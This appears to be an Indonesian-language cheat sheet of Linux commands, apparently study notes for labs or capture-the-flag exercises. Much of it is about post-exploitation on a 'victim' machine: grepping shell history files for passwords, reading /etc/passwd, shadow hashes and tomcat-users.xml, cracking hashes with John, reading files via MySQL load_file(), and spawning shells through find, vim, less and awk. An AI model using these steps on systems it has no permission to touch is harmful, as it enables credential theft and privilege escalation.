Perintah Dasar Linux
1. Melihat Isi File
cat file.txt
Menampilkan isi dari file.txt.
2. Navigasi Direktori
cd ..
Untuk berpindah ke direktori parent.
cd directory
Untuk berpindah ke direktori tertentu.
3. Melihat Isi Direktori
ls
Melihat isi direktori saat ini.
ls -a
Menampilkan semua file, termasuk file tersembunyi.
4. Akses File di Direktori yang Terbatas
Jika kamu tidak dapat mengakses direktori tertentu seperti /home/victim, namun masih bisa melihat file di dalamnya:
cat /home/victim/file.txt
Ini menunjukkan bahwa kamu masih bisa membaca file meskipun izin pada direktori terbatas.
5. Melihat Riwayat Bash
.bash_history
Banyak informasi sensitif tersimpan di .bash_history, seperti password atau command penting lainnya.
6. Mencari .bash_history di Direktori
find /home -name .bash_history
Mencari file .bash_history di seluruh direktori /home dan turunannya.
7. Mencari Pola di File dengan Grep
grep "pola" file.txt
Mencari pola spesifik dalam file tertentu.
8. Menggunakan find dengan grep
find /home -name ".bashrc" -exec grep "variable" {} \;
Mencari variabel di dalam file .bashrc di seluruh direktori /home.
9. Mencari Variabel di .bashrc
grep "$Variable" ~/.bashrc
Mencari variabel yang didefinisikan di .bashrc.
10. Melihat Riwayat di Shell Lain
.zsh_history
Jika target menggunakan shell zsh, riwayat command dapat ditemukan di file .zsh_history.
11. Mencari Home Directory Lain
grep "/home" /etc/passwd
Mencari home directory pengguna di luar /home dengan melihat file /etc/passwd.
12. Menggunakan grep dengan find
find /home -name ".bash_history" -exec grep -A 1 "password" {} \;
Mencari kata “password” dan satu baris setelahnya di dalam file .bash_history.
13. Melihat Izin Direktori dan File
ls -ld directory_name
Menampilkan izin dan hak akses direktori atau file. Contoh output:
drwxr-xr-x 2 root root 4096 Jan 1 12:34 directory_name
Bit-bit di awal:
d: Tipe file (direktori).rwxr-xr-x: Izin baca, tulis, eksekusi untuk owner, grup, dan others.
14. Ekstraksi File Terkompresi
Untuk file .tgz:
tar -xvzf file.tgz
Untuk file .tbz:
tar -xvjf file.tbz
15. Melihat Jenis File
file filename
Menampilkan tipe file filename.
16. Menggunakan strings untuk Melihat String Teks
strings filename
Menampilkan string yang dapat dibaca dalam file biner.
17. Menggunakan su untuk Beralih Pengguna
su victim
Mengganti pengguna menjadi victim jika kredensial diketahui.
18. Crack Hash Password
Menggunakan John the Ripper:
john hashfile
19. Prefix Hash di /etc/shadow
Mengetahui jenis hash dari prefix yang ada di /etc/shadow, misalnya $6$ menunjukkan hashing dengan SHA-512.
20. Informasi Sensitif di Tomcat
Mencari file konfigurasi Tomcat untuk informasi sensitif:
cat /etc/tomcat/tomcat-users.xml
21. Menggunakan MySQL
Login ke MySQL sebagai root:
mysql -u root
Jika butuh password:
mysql -u root -p
22. Menggunakan load_file() di MySQL
SELECT load_file('/etc/passwd');
Membaca file sistem melalui MySQL.
23. Menggunakan PostgreSQL (psql)
psql
Untuk mengakses database PostgreSQL.
24. Copy File ke Table
COPY table_name FROM '/path/to/file' DELIMITER ',';
25. Menggunakan SQLite3
sqlite3 database.db
Untuk mengakses database SQLite.
26. Melihat Perintah sudo yang Tersedia
sudo -l
Melihat perintah yang dapat dijalankan dengan sudo.
27. Menjalankan Command sebagai Pengguna Lain
sudo -u victim command
Menjalankan perintah sebagai pengguna victim.
28. Akses Bash Menggunakan find
find / -exec /bin/bash \;
Menjalankan bash menggunakan find.
29. Akses Bash Menggunakan vi/vim
Di dalam vim, ketik:
:set shell=/bin/bash
:shell
30. Akses Bash Menggunakan less
Di dalam less, ketik:
!bash
31. Menggunakan awk untuk Akses Bash
awk 'BEGIN {system("/bin/bash")}'
32. Setgid dengan chmod
chmod +xs file_or_directory
Menetapkan bit setgid untuk file atau direktori.
33. Menjalankan cat Menggunakan Perl
perl -e 'open my $f, "<", "file.txt"; print <$f>;'
34. Menjalankan cat Menggunakan Python
python -c 'print(open("file.txt").read())'
35. Menjalankan cat Menggunakan Ruby
ruby -e 'puts File.read("file.txt")'
36. Menjalankan cat Menggunakan Node.js
node -e 'require("fs").readFile("file.txt", "utf8", (err, data) => { console.log(data); });'